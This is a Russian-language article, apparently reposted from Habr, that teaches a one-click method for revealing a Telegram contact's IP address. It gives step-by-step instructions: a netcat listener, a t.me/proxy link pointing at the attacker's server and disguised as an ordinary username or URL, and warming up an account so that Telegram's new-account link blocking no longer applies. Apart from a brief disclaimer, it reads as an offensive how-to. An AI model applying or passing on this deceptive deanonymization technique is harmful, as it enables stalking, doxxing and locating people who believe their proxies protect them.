Как узнать айпи собеседника в телеграм в 1 клик? Дуров не фиксит это третий год…
В телеграмме есть способ раскрыть IP собеседника в 1 клик, не скидывая ему никаких файлов, картинок и даже не заставляю его переходить по сомнительным ссылкам.
Телеграм даже не предупреждает о том, что вы переходите по какой-то странной ссылке.
А как?
Информация в статье создана для информативных целей, если вы будете использовать информацию из статьи вас набутылят забанят и заставят извиняться
Это одна из множества узявимостей телеги.
Речь про 1-click уязвимость, которая позволяет узнать IP собеседника , если он нажмет на username, ссылку, текст в обход всех прокси...
Оно работает на IOS и Android еще с 2023 года
Для схемы нужно:
-
Открыть прослушивание любого порта на вашем сервере. Например, через netcat: nc -lvnp <ваш_порт> 2. Подставить в ссылку вида https://t.me/proxy?server=8.8.8.8&port=1337 [1] (тут данные
вашегосервера) 3. Вставить эту ссылку под видом обычной, например: @durov [2] (https://t.me/proxy?server=8.8.8.8&port=1337 [1]) или https://google.com [3] (https://t.me/proxy?server=8.8.8.8&port=1337 [1]) -
Подставить в ссылку вида https://t.me/proxy?server=8.8.8.8&port=1337 [1] (тут данные
вашегосервера) -
Вставить эту ссылку под видом обычной, например: @durov [2] (https://t.me/proxy?server=8.8.8.8&port=1337 [1]) или https://google.com [3] (https://t.me/proxy?server=8.8.8.8&port=1337 [1])
Итого что у нас выходит?
При попытке перейти на такую ссылку Telegram сразу отправит пакет на сервер для проверки работоспособности прокси, телеграм нас никак об этом не предупреждает
и мы в один клик сливаем свое местоположение каком-то типу с улицы.
Телеграм умеет защищаться от такого! Да ... умеет же...?
Если вам написал какой-то новый аккаунт с ссылкой в сообщении, то она не будет кликабельна. Казалось бы, это защищает нас от случайного клика, но на деле это значит, что пару часов прогрева + наличие белого акка с хорошей историей... и все, ссылка снова становится кликабельной.
Вот такие пироги...
Почему это происходит?
На Android и iOS клиентах включен автопинг прокси до добавления, а во всех клиентах нет предупреждения при нажатии, если ссылка внутренняя. А прокси ссылка тоже считается внутреней (http://t.me/proxy [4]), поэтому при нажатии на ссылку ваш IP автоматически раскроется.
То есть, мы не вставляем никаких левых фишинговых ссылок, мы бувавльно вставляем линк на сам телеграмм (http://t.me/proxy [4]?) [5] и его сервис, поэтому никаких предупреждений и сообщений от телеги нет
Например @durov [2], (https://t.me/proxy?server=1.1.1.1&port=53 [6]) https://t.me/femidasearch [7] (https://t.me/proxy?server=1.1.1.1&port=53 [6]), (https://t.me/durov [8]) https://google.com [3] (https://t.me/proxy?server=1.1.1.1&port=53 [6]) и т. д.
Запускаете mtproxy, добавляете ссылку на ваш прокси поверх ссылки Telegram или любого другого текста, ждете, смотрите логи подключений IP и все...
Данные принадлежат кому угодно, но не нам :-(
Все ваши УДАЛЕННЫЕ сообщения в Telegram хранятся на устройстве... их можно восстановить [9]
Автор: free_kedr
Источник [10]
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/ip/440956
Ссылки в тексте:
[1] https://t.me/proxy?server=8.8.8.8&port=1337: https://t.me/proxy?server=8.8.8.8&port=1337
[2] @durov: https://www.pvsm.ru/users/durov
[3] https://google.com: https://google.com
[4] http://t.me/proxy: http://t.me/proxy
[5] ?): http://t.me/proxy?)
[6] https://t.me/proxy?server=1.1.1.1&port=53: https://t.me/proxy?server=1.1.1.1&port=53
[7] https://t.me/femidasearch: https://t.me/femidasearch
[8] https://t.me/durov: https://t.me/durov
[9] Все ваши УДАЛЕННЫЕ сообщения в Telegram хранятся на устройстве... их можно восстановить: https://t.me/femidasearch/217
[10] Источник: https://habr.com/ru/companies/femida_search/articles/983028/?utm_source=habrahabr&utm_medium=rss&utm_campaign=983028
Нажмите здесь для печати.